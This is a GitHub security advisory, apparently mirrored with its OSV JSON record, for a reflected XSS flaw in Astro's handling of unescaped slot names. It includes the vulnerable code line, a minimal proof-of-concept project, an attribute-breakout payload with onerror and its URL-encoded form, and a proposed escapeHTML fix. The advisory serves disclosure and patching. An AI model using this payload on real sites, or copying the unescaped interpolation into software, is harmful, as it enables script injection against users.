GHSA-8HV8-536X-4WQP
Vulnerability from github – Published: 2026-06-16 14:05 – Updated: 2026-06-16 14:05Summary
When a component uses a client:* directive, Astro inserts named slot content into a data-astro-template attribute without HTML escaping the slot name allowing an attacker to break out of the attribute context and inject arbitrary HTML, resulting in reflected XSS during SSR.
This is similar to GHSA-wrwg-2hg8-v723 but exploits a different injection point.
Vulnerable Code
packages/astro/src/runtime/server/render/component.ts:371:376
// component.ts:371
`<template data-astro-template${key !== 'default' ? `="${key}"` : ''}>${children[key]}</template>`
I found that key is interpolated directly into the attribute value without proper escaping.
Proof of Concept
For the PoC, I set up with a minimal repository with Astro 6.3.1, Node.js: v26.0.0.
astro.config.mjs
import react from '@astrojs/react';
import node from '@astrojs/node';
import { defineConfig } from 'astro/config';
export default defineConfig({
output: 'server',
adapter: node({ mode: 'standalone' }),
integrations: [react()],
});
src/pages/index.astro
---
import Wrapper from '../components/Wrapper.jsx';
const slotName = Astro.url.searchParams.get('tab') ?? 'default';
---
<html><body>
<Wrapper client:load>
<div slot={slotName}>content</div>
</Wrapper>
</body></html>
src/components/Wrapper.jsx
export default function Wrapper() { return null; }
Payload:
abc"></template></astro-island><img src=x onerror=confirm(document.domain)><!--
Accessing this URL will trigger the popup.
http://localhost:4321/?tab=abc%22%3E%3C%2Ftemplate%3E%3C%2Fastro-island%3E%3Cimg+src%3Dx+onerror%3Dconfirm(document.domain)%3E%3C!--
This will render in html.
<template data-astro-template="abc"></template></astro-island>
<img src=x onerror=confirm(document.domain)><!--">content</template>
Fix
I suggest leveraging the existing escape function on the slot name.
// component.ts:371
`<template data-astro-template${key !== 'default' ? `="${escapeHTML(String(key))}"` : ''}>${children[key]}</template>`
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "astro"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.3.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-50146"
],
"database_specific": {
"cwe_ids": [
"CWE-79",
"CWE-80"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-16T14:05:06Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\nWhen a component uses a `client:*` directive, Astro inserts named slot content into a `data-astro-template` attribute without HTML escaping the slot name allowing an attacker to break out of the attribute context and inject arbitrary HTML, resulting in reflected XSS during SSR.\n\nThis is similar to GHSA-wrwg-2hg8-v723 but exploits a different injection point.\n\n## Vulnerable Code\n\n`packages/astro/src/runtime/server/render/component.ts:371:376`\n\n```ts\n// component.ts:371\n`\u003ctemplate data-astro-template${key !== \u0027default\u0027 ? `=\"${key}\"` : \u0027\u0027}\u003e${children[key]}\u003c/template\u003e`\n```\n\nI found that key is interpolated directly into the attribute value without proper escaping.\n\n## Proof of Concept\n\nFor the PoC, I set up with a minimal repository with Astro 6.3.1, Node.js: v26.0.0.\n\n**`astro.config.mjs`**\n```js\nimport react from \u0027@astrojs/react\u0027;\nimport node from \u0027@astrojs/node\u0027;\nimport { defineConfig } from \u0027astro/config\u0027;\nexport default defineConfig({\n output: \u0027server\u0027,\n adapter: node({ mode: \u0027standalone\u0027 }),\n integrations: [react()],\n});\n```\n\n**`src/pages/index.astro`**\n```astro\n---\nimport Wrapper from \u0027../components/Wrapper.jsx\u0027;\nconst slotName = Astro.url.searchParams.get(\u0027tab\u0027) ?? \u0027default\u0027;\n---\n\u003chtml\u003e\u003cbody\u003e\n \u003cWrapper client:load\u003e\n \u003cdiv slot={slotName}\u003econtent\u003c/div\u003e\n \u003c/Wrapper\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\n\n**`src/components/Wrapper.jsx`**\n```jsx\nexport default function Wrapper() { return null; }\n```\n\n**Payload:**\n```\nabc\"\u003e\u003c/template\u003e\u003c/astro-island\u003e\u003cimg src=x onerror=confirm(document.domain)\u003e\u003c!--\n```\nAccessing this URL will trigger the popup.\n\nhttp://localhost:4321/?tab=abc%22%3E%3C%2Ftemplate%3E%3C%2Fastro-island%3E%3Cimg+src%3Dx+onerror%3Dconfirm(document.domain)%3E%3C!--\n\n\n\n\u003cimg width=\"1268\" height=\"592\" alt=\"image\" src=\"https://github.com/user-attachments/assets/675cdc04-4134-4d83-883c-abe16d751ec7\" /\u003e\n\n\n\nThis will render in html.\n\n```html\n\u003ctemplate data-astro-template=\"abc\"\u003e\u003c/template\u003e\u003c/astro-island\u003e\n\u003cimg src=x onerror=confirm(document.domain)\u003e\u003c!--\"\u003econtent\u003c/template\u003e\n```\n\n## Fix\n\nI suggest leveraging the existing escape function on the slot name.\n\n```ts\n// component.ts:371\n`\u003ctemplate data-astro-template${key !== \u0027default\u0027 ? `=\"${escapeHTML(String(key))}\"` : \u0027\u0027}\u003e${children[key]}\u003c/template\u003e`\n```\n\n---",
"id": "GHSA-8hv8-536x-4wqp",
"modified": "2026-06-16T14:05:06Z",
"published": "2026-06-16T14:05:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/withastro/astro/security/advisories/GHSA-8hv8-536x-4wqp"
},
{
"type": "PACKAGE",
"url": "https://github.com/withastro/astro"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Astro: Reflected XSS via unescaped slot name"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.